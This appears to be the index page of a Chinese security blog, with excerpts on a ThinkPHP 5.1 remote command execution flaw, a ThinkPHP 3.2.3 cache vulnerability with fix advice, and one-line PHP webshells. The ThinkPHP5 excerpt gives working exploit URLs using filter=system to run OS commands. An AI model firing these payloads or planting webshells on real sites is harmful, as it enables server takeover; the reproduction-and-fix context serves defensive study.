bug修复
飞鱼计划
加入我qq:2579679536
备注:资源分享
展开
-
ThinkPHP5 框架缺陷导致远程命令执行
TP5.1.*thinkphp5.1.29为例1、代码执行:http://zhiliao.cn/?s=index/\think\Request/input&filter=phpinfo&data=12、命令执行:http://zhiliao.cn/?s=index/\think\Request/input&filter=system&data=操作系统命令http://zhiliao.cn/index.php?s=index/%5Cthink%5C原创 2020-06-27 15:17:51 · 1556 阅读 · 0 评论 -
ThinkPhp3.2.3缓存漏洞复现以及修复建议
ThinkPhp3.2.3缓存漏洞复现以及修复建议今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议首先我们下载最新的thinkphp...转载 2019-04-18 09:48:13 · 9840 阅读 · 0 评论 -
一句话木马
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。我们如何发送命令,发送的命令如何执行?我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们...原创 2019-09-06 17:05:36 · 20165 阅读 · 2 评论